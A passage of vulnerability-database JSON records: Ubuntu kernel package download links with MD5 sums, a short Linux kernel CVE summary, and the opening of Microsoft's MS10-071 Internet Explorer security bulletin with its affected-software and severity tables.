\r\nhttp://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.35-25-powerpc64-smp-di_2.6.35-25.44_powerpc.udeb\r\n Size/MD5: 113730 0b5edef1b92d9697fb2c79973caec399\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.35-25-powerpc-di_2.6.35-25.44_powerpc.udeb\r\n Size/MD5: 419138 1144a2e815d1a08aa73ad69534ed3f7e\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.35-25-powerpc64-smp-di_2.6.35-25.44_powerpc.udeb\r\n Size/MD5: 353802 a727b73aa83ebf6a378aeab8e99b8040\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.35-25-powerpc-di_2.6.35-25.44_powerpc.udeb\r\n Size/MD5: 4461112 dcba40e7d1c048378a4bdb5757c279f1\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.35-25-powerpc64-smp-di_2.6.35-25.44_powerpc.udeb\r\n Size/MD5: 5907238 093ec0488ff59d7306ad704a623277d6\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.35-25-powerpc-smp_2.6.35-25.44_powerpc.deb\r\n Size/MD5: 880440 c8415632582b9bee610d781a71eef649\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.35-25-powerpc64-smp_2.6.35-25.44_powerpc.deb\r\n Size/MD5: 900974 1fcd395e69b973e62be960186e8a21af\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.35-25-powerpc_2.6.35-25.44_powerpc.deb\r\n Size/MD5: 883804 4271f6745945df7687327e8b0d8128ab\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.35-25-powerpc-smp_2.6.35-25.44_powerpc.deb\r\n Size/MD5: 30855650 34d668a0b487785e2b0921c3394521d1\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.35-25-powerpc64-smp_2.6.35-25.44_powerpc.deb\r\n Size/MD5: 32207392 bb0a4413201518187926ad8d9d115240\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.35-25-powerpc_2.6.35-25.44_powerpc.deb\r\n Size/MD5: 30621436 eb3ee886b1e022605b5d64a7999281f6\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.35-1025.44_powerpc.deb\r\n Size/MD5: 798964 0511cdc0ba38ab40edd808b423996dbb\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/linux-tools-2.6.35-25_2.6.35-25.44_powerpc.deb\r\n Size/MD5: 275392 d098440a59214ee352ebf7e81d66cc42\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.35-25-powerpc-di_2.6.35-25.44_powerpc.udeb\r\n Size/MD5: 253286 8454ff19c8110725b5f4db1322737904\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.35-25-powerpc64-smp-di_2.6.35-25.44_powerpc.udeb\r\n Size/MD5: 266250 53907b4567b25336f40f16ec9ef89b3e\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.35-25-powerpc-di_2.6.35-25.44_powerpc.udeb\r\n Size/MD5: 224226 2e11ea5bdf60678876f59cfc98a3f0ef\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.35-25-powerpc64-smp-di_2.6.35-25.44_powerpc.udeb\r\n Size/MD5: 227734 3e3025dcf9f6de8a0cbd345e88a67630\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.35-25-powerpc-di_2.6.35-25.44_powerpc.udeb\r\n Size/MD5: 32806 d2bd786d445e0271d9c5691fe508c302\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.35-25-powerpc64-smp-di_2.6.35-25.44_powerpc.udeb\r\n Size/MD5: 37500 274f5b29664ae331592b5bceeaf7a8c6\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.35-25-powerpc-di_2.6.35-25.44_powerpc.udeb\r\n Size/MD5: 378546 8c5b0851faac9356e7cfd84386963730\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.35-25-powerpc64-smp-di_2.6.35-25.44_powerpc.udeb\r\n Size/MD5: 425696 4604578537d1ad4e59b1f29db3f9880a\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.35-25-powerpc-di_2.6.35-25.44_powerpc.udeb\r\n Size/MD5: 2686662 92e57b5837628701945d32badf3c416b\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.35-25-powerpc64-smp-di_2.6.35-25.44_powerpc.udeb\r\n Size/MD5: 2902434 22c2b4e2c5edaf64a2ebbd502f1aa0af\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.35-25-powerpc-di_2.6.35-25.44_powerpc.udeb\r\n Size/MD5: 187494 db4bc14caff41812305dcc78d24c8ed9\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.35-25-powerpc64-smp-di_2.6.35-25.44_powerpc.udeb\r\n Size/MD5: 181612 e4355264a67521ec94f848f2f7875c08\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.35-25-powerpc-di_2.6.35-25.44_powerpc.udeb\r\n Size/MD5: 273740 37db24a54c2d69d9ed5aeababd8aeeac\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.35-25-powerpc64-smp-di_2.6.35-25.44_powerpc.udeb\r\n Size/MD5: 311726 fe6c5174161a9bb54e34b558920bf82d\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.35-25-powerpc-di_2.6.35-25.44_powerpc.udeb\r\n Size/MD5: 215442 c1e632adce0eca57c2761de6c2dbab70\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.35-25-powerpc64-smp-di_2.6.35-25.44_powerpc.udeb\r\n Size/MD5: 248742 f80887ff4d7632c9b89d9efa1b9f1a57\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.35-25-powerpc-di_2.6.35-25.44_powerpc.udeb\r\n Size/MD5: 50996 7f2464f954a5f9c1352a7bf2feca7a01\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.35-25-powerpc64-smp-di_2.6.35-25.44_powerpc.udeb\r\n Size/MD5: 45498 799385f7c9ab08add315e24a01d6acda\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.35-25-powerpc-di_2.6.35-25.44_powerpc.udeb\r\n Size/MD5: 113028 b99dd0a4c42d6cbf9a25066455fa7d4b\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.35-25-powerpc64-smp-di_2.6.35-25.44_powerpc.udeb\r\n Size/MD5: 125738 1bf0cfbb83c9f3b503bc5d88a0c49039\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.35-25-powerpc-di_2.6.35-25.44_powerpc.udeb\r\n Size/MD5: 75432 d415fcbec62915a16c260184387b8077\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.35-25-powerpc64-smp-di_2.6.35-25.44_powerpc.udeb\r\n Size/MD5: 79674 49365482989aa3c559f30fb337a534f6\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.35-25-powerpc-di_2.6.35-25.44_powerpc.udeb\r\n Size/MD5: 79706 bdad178f5656144670fc025c8aebc5db\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.35-25-powerpc64-smp-di_2.6.35-25.44_powerpc.udeb\r\n Size/MD5: 27592 affe4f3239fb116dc60ca13611a029df\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.35-25-powerpc-di_2.6.35-25.44_powerpc.udeb\r\n Size/MD5: 8920 696481af377862403690621d0be6f995\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.35-25-powerpc64-smp-di_2.6.35-25.44_powerpc.udeb\r\n Size/MD5: 10238 76d80a50ea12c520ce0e4c342141032b\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.35-25-powerpc-di_2.6.35-25.44_powerpc.udeb\r\n Size/MD5: 61862 1923f996fbc3d34e4733a11ee05170de\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.35-25-powerpc64-smp-di_2.6.35-25.44_powerpc.udeb\r\n Size/MD5: 73018 4505bb31614baa997fb6ffad51a66c61\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.35-25-powerpc-di_2.6.35-25.44_powerpc.udeb\r\n Size/MD5: 115078 44c52873dcf6d9ecd4da17e33341b25d\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.35-25-powerpc64-smp-di_2.6.35-25.44_powerpc.udeb\r\n Size/MD5: 146728 b88126bab1c134d7adf8ece2bb25685a\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.35-25-powerpc-di_2.6.35-25.44_powerpc.udeb\r\n Size/MD5: 1700462 071852dc7e1a09ba028316c7b5e91289\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.35-25-powerpc64-smp-di_2.6.35-25.44_powerpc.udeb\r\n Size/MD5: 1632350 dff07d1318a5c2bd1ea21841c3591e3d\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.35-25-powerpc-di_2.6.35-25.44_powerpc.udeb\r\n Size/MD5: 78400 1f1666d18084650c4104323778038126\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.35-25-powerpc64-smp-di_2.6.35-25.44_powerpc.udeb\r\n Size/MD5: 83916 e832c72b9755faf607c929a892012827\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/squashfs-modules-2.6.35-25-powerpc-di_2.6.35-25.44_powerpc.udeb\r\n Size/MD5: 20522 750c9480c55724ced6376430c1ffc0ae\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/squashfs-modules-2.6.35-25-powerpc64-smp-di_2.6.35-25.44_powerpc.udeb\r\n Size/MD5: 22148 be237e00e1971703d4aa40bd070899c1\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.35-25-powerpc-di_2.6.35-25.44_powerpc.udeb\r\n Size/MD5: 68312 9cb576dd7c69ceabe15421ae899958a5\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.35-25-powerpc64-smp-di_2.6.35-25.44_powerpc.udeb\r\n Size/MD5: 81460 7575869bcbd2150e67c225bbaa17d2be\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.35-25-powerpc-di_2.6.35-25.44_powerpc.udeb\r\n Size/MD5: 129510 3fcd48fb9f5e97b7f130c98467eb8e35\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.35-25-powerpc64-smp-di_2.6.35-25.44_powerpc.udeb\r\n Size/MD5: 146936 f6428500371c6a3fd35f7c259158f648\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/vlan-modules-2.6.35-25-powerpc-di_2.6.35-25.44_powerpc.udeb\r\n Size/MD5: 22930 0f7832a57127823ee0292f1803d59326\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/vlan-modules-2.6.35-25-powerpc64-smp-di_2.6.35-25.44_powerpc.udeb\r\n Size/MD5: 26632 bd8c788a92ebcf309926273018d83631\r\n", "edition": 1, "modified": "2011-02-02T00:00:00", "published": "2011-02-02T00:00:00", "id": "SECURITYVULNS:DOC:25593", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:25593", "title": "[USN-1054-1] Linux kernel vulnerabilities", "type": "securityvulns", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:40", "bulletinFamily": "software", "cvelist": ["CVE-2011-0521", "CVE-2010-4163", "CVE-2010-4529", "CVE-2010-4668", "CVE-2010-4165", "CVE-2010-4346", "CVE-2010-4527", "CVE-2010-4649", "CVE-2010-0435", "CVE-2010-3086", "CVE-2010-4169", "CVE-2010-4656", "CVE-2010-4158", "CVE-2010-4526", "CVE-2010-4162", "CVE-2011-1044", "CVE-2010-4249", "CVE-2010-4157", "CVE-2010-4342", "CVE-2010-4160", "CVE-2010-4565"], "description": "DoS via sendmsg, mprotect, setsockopt, Hypervisor/KVM etc, information leaks, privilege escalation.", "edition": 1, "modified": "2011-02-02T00:00:00", "published": "2011-02-02T00:00:00", "id": "SECURITYVULNS:VULN:11394", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11394", "title": "Linux kernel multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:37", "bulletinFamily": "software", "cvelist": ["CVE-2010-3331", "CVE-2010-0808", "CVE-2010-3330", "CVE-2010-3328", "CVE-2010-3324", "CVE-2010-3325", "CVE-2010-3243", "CVE-2010-4243", "CVE-2010-3326", "CVE-2010-3329", "CVE-2010-3327"], "description": "Microsoft Security Bulletin MS10-071 - Critical\r\nCumulative Security Update for Internet Explorer (2360131)\r\nPublished: October 12, 2010\r\n\r\nVersion: 1.0\r\nGeneral Information\r\nExecutive Summary\r\n\r\nThis security update resolves seven privately reported vulnerabilities and three publicly disclosed vulnerabilities in Internet Explorer. The most severe vulnerabilities could allow remote code execution if a user views a specially crafted Web page using Internet Explorer. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\r\nThis security update is rated Critical for Internet Explorer 6, Internet Explorer 7, and Internet Explorer 8 on Windows clients; and Important for Internet Explorer 6, Internet Explorer 7, and Internet Explorer 8 on Windows servers. For more information, see the subsection, Affected and Non-Affected Software, in this section.\r\n\r\nThe security update addresses these vulnerabilities by modifying the way that Internet Explorer handles objects in memory, CSS special characters, HTML sanitization, the AutoComplete feature, the Anchor element, and script during certain processes. For more information about the vulnerabilities, see the Frequently Asked Questions (FAQ) subsection under the next section, Vulnerability Information.\r\n\r\nRecommendation. The majority of customers have automatic updating enabled and will not need to take any action because this security update will be downloaded and installed automatically. Customers who have not enabled automatic updating need to check for updates and install this update manually. For information about specific configuration options in automatic updating, see Microsoft Knowledge Base Article 294871.\r\n\r\nFor administrators and enterprise installations, or end users who want to install this security update manually, Microsoft recommends that customers apply the update immediately using update management software, or by checking for updates using the Microsoft Update service.\r\n\r\nSee also the section, Detection and Deployment Tools and Guidance, later in this bulletin.\r\n\r\nKnown Issues. None\r\nTop of sectionTop of section\r\nAffected and Non-Affected Software\r\n\r\nThe following software have been tested to determine which versions or editions are affected. Other versions or editions are either past their support life cycle or are not affected. To determine the support life cycle for your software version or edition, visit Microsoft Support Lifecycle.\r\n\r\nAffected Software\r\nOperating System\tComponent\tMaximum Security Impact\tAggregate Severity Rating\tBulletins Replaced by This Update\r\nInternet Explorer 6\t \t \t \t \r\n\r\nWindows XP Service Pack 3\r\n\t\r\n\r\nInternet Explorer 6\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nMS10-053\r\n\r\nWindows XP Professional x64 Edition Service Pack 2\r\n\t\r\n\r\nInternet Explorer 6\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nMS10-053\r\n\r\nWindows Server 2003 Service Pack 2\r\n\t\r\n\r\nInternet Explorer 6\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS10-053\r\n\r\nWindows Server 2003 x64 Edition Service Pack 2\r\n\t\r\n\r\nInternet Explorer 6\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS10-053\r\n\r\nWindows Server 2003 with SP2 for Itanium-based Systems\r\n\t\r\n\r\nInternet Explorer 6\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS10-053\r\nInternet Explorer 7\t \t \t \t \r\n\r\nWindows XP Service Pack 3\r\n\t\r\n\r\nInternet Explorer 7\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nMS10-053\r\n\r\nWindows XP Professional x64 Edition Service Pack 2\r\n\t\r\n\r\nInternet Explorer 7\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nMS10-053\r\n\r\nWindows Server 2003 Service Pack 2\r\n\t\r\n\r\nInternet Explorer 7\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS10-053\r\n\r\nWindows Server 2003 x64 Edition Service Pack 2\r\n\t\r\n\r\nInternet Explorer 7\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS10-053\r\n\r\nWindows Server 2003 with SP2 for Itanium-based Systems\r\n\t\r\n\r\nInternet Explorer 7\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS10-053\r\n\r\nWindows Vista Service Pack 1 and Windows Vista Service Pack 2\r\n\t\r\n\r\nInternet Explorer 7\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nMS10-053\r\n\r\nWindows Vista x64 Edition Service Pack 1 and Windows Vista x64 Edition Service Pack 2\r\n\t\r\n\r\nInternet Explorer 7\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nMS10-053\r\n\r\nWindows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2\r\n\t\r\n\r\nInternet Explorer 7**\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS10-053\r\n\r\nWindows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2\r\n\t\r\n\r\nInternet Explorer 7**\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS10-053\r\n\r\nWindows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2\r\n\t\r\n\r\nInternet Explorer 7\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS10-053\r\nInternet Explorer 8\t \t \t \t \r\n\r\nWindows XP Service Pack 3\r\n\t\r\n\r\nInternet Explorer 8\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nMS10-053\r\n\r\nWindows XP Professional x64 Edition Service Pack 2\r\n\t\r\n\r\nInternet Explorer 8\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nMS10-053\r\n\r\nWindows Server 2003 Service Pack 2\r\n\t\r\n\r\nInternet Explorer 8\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS10-053\r\n\r\nWindows Server 2003 x64 Edition Service Pack 2\r\n\t\r\n\r\nInternet Explorer 8\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS10-053\r\n\r\nWindows Vista Service Pack 1 and Windows Vista Service Pack 2\r\n\t\r\n\r\nInternet Explorer 8\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nMS10-053\r\n\r\nWindows Vista x64 Edition Service Pack 1 and Windows Vista x64 Edition Service Pack 2\r\n\t\r\n\r\nInternet Explorer 8\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nMS10-053\r\n\r\nWindows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2\r\n\t\r\n\r\nInternet Explorer 8**\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS10-053\r\n\r\nWindows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2\r\n\t\r\n\r\nInternet Explorer 8**\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS10-053\r\n\r\nWindows 7 for 32-bit Systems\r\n\t\r\n\r\nInternet Explorer 8\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nMS10-053\r\n\r\nWindows 7 for x64-based Systems\r\n\t\r\n\r\nInternet Explorer 8\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nMS10-053\r\n\r\nWindows Server 2008 R2 for x64-based Systems\r\n\t\r\n\r\nInternet Explorer 8**\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS10-053\r\n\r\nWindows Server 2008 R2 for Itanium-based Systems\r\n\t\r\n\r\nInternet Explorer 8\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS10-053\r\n\r\n**Server Core installation not affected. The vulnerabilities addressed by this update do not affect supported editions of Windows Server 2008 or Windows Server 2008 R2 as indicated, when installed using the Server Core installation option. For more information on this installation option, see the TechNet articles, Managing a Server Core Installation and Servicing a Server Core Installation. Note that the Server Core installation option does not apply to certain editions of Windows Server 2008 and Windows Server 2008 R2; see Compare Server Core Installation Options.\r\nTop of sectionTop of section\r\n\t\r\nFrequently Asked Questions (FAQ) Related to This Security Update\r\n\r\nWhere are the file information details? \r\nRefer to the reference tables in the Security Update Deployment section for the location of the file information details.\r\n\r\nHow are the Windows 7 Service Pack 1 Beta and Windows Server 2008 R2 Service Pack 1 Beta releases affected by these vulnerabilities? \r\nWindows 7 Service Pack 1 Beta and Windows Server 2008 R2 Service Pack 1 Beta are affected by the vulnerabilities described in this bulletin. Customers running these beta releases are encouraged to download and apply the update to their systems. Security updates are available from Microsoft Update and Windows Update. The security update is also available for download from the Microsoft Download Center.\r\n\r\nHow is this security update related to MS10-072? \r\nThe HTML Sanitization Vulnerability (CVE-2010-3243) and HTML Sanitization Vulnerability (CVE-2010-3324) described in this bulletin also affect Microsoft SharePoint. However, you may install only the updates that correspond to the software you have installed on your systems. If you have installed Internet Explorer, apply the required updates according to this bulletin. If you have installed Microsoft SharePoint, apply the required updates according to MS10-072.\r\n\r\nWhy does this update address several reported security vulnerabilities? \r\nThis update contains support for several vulnerabilities because the modifications that are required to address these issues are located in related files. Instead of having to install several updates that are almost the same, customers need to install this update only.\r\n\r\nI have selected a default browser other than Internet Explorer. Do I still need to apply this update? \r\nInternet Explorer provides application services and functionality for Windows and third-party programs that are maintained through the Cumulative Security Update for Internet Explorer. Microsoft recommends that customers apply the update immediately. The majority of customers have automatic updating enabled and will not need to take any action as this security update will be downloaded and installed automatically.\r\n\r\nI am using an older release of the software discussed in this security bulletin. What should I do? \r\nThe affected software listed in this bulletin have been tested to determine which releases are affected. Other releases are past their support life cycle. For more information about the product lifecycle, visit the Microsoft Support Lifecycle Web site.\r\n\r\nIt should be a priority for customers who have older releases of the software to migrate to supported releases to prevent potential exposure to vulnerabilities. To determine the support lifecycle for your software release, see Select a Product for Lifecycle Information. For more information about service packs for these software releases, see Lifecycle Supported Service Packs.\r\n\r\nCustomers who require custom support for older software must contact their Microsoft account team representative, their Technical Account Manager, or the appropriate Microsoft partner representative for custom support options. Customers without an Alliance, Premier, or Authorized Contract can contact their local Microsoft sales office. For contact information, visit the Microsoft Worldwide Information Web site, select the country in the Contact Information list, and then click Go to see a list of telephone numbers. When you call, ask to speak with the local Premier Support sales manager. For more information, see the Microsoft Support Lifecycle Policy FAQ.\r\nTop of sectionTop of section\r\nVulnerability Information\r\n\t\r\nSeverity Ratings and Vulnerability Identifiers\r\n\r\nThe following severity ratings assume the potential maximum impact of the vulnerability. For information regarding the likelihood, within 30 days of this security bulletin's release, of the exploitability of the vulnerability in relation to its severity rating and security impact, please see the Exploitability Index in the October bulletin summary. For more information, see Microsoft Exploitability Index.\r\nVulnerability Severity Rating and Maximum Security Impact by Affected Software\r\nAffected Software\tAutoComplete Information Disclosure Vulnerability - CVE-2010-0808\tHTML Sanitization Vulnerability - CVE-2010-3243\tHTML Sanitization Vulnerability - CVE-2010-3324\tCSS Special Character Information Disclosure Vulnerability - CVE-2010-3325\tUninitialized Memory Corruption Vulnerability - CVE-2010-3326\tAnchor Element Information Disclosure Vulnerability - CVE-2010-3327\tUninitialized Memory Corruption Vulnerability - CVE-2010-3328\tUninitialized Memory Corruption Vulnerability - CVE-2010-3329\tCross-Domain Information Disclosure Vulnerability - CVE-2010-3330\tUninitialized Memory Corruption Vulnerability - CVE-2010-3331\tAggregate Severity Rating\r\nInternet Explorer 6\t \t \t \t \t \t \t \t \t \t \t \r\n\r\nInternet Explorer 6 for Windows XP Service Pack 3\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nInternet Explorer 6 for Windows XP Professional x64 Edition Service Pack 2\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nInternet Explorer 6 for Windows Server 2003 Service Pack 2\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nModerate \r\nRemote Code Execution\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nModerate \r\nRemote Code Execution\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\r\nInternet Explorer 6 for Windows Server 2003 x64 Edition Service Pack 2\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nModerate \r\nRemote Code Execution\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nModerate \r\nRemote Code Execution\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\r\nInternet Explorer 6 for Windows Server 2003 with SP2 for Itanium-based Systems\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nModerate \r\nRemote Code Execution\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nModerate \r\nRemote Code Execution\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\nInternet Explorer 7\t \t \t \t \t \t \t \t \t \t \t \r\n\r\nInternet Explorer 7 for Windows XP Service Pack 3\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nInternet Explorer 7 for Windows XP Professional x64 Edition Service Pack 2\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote 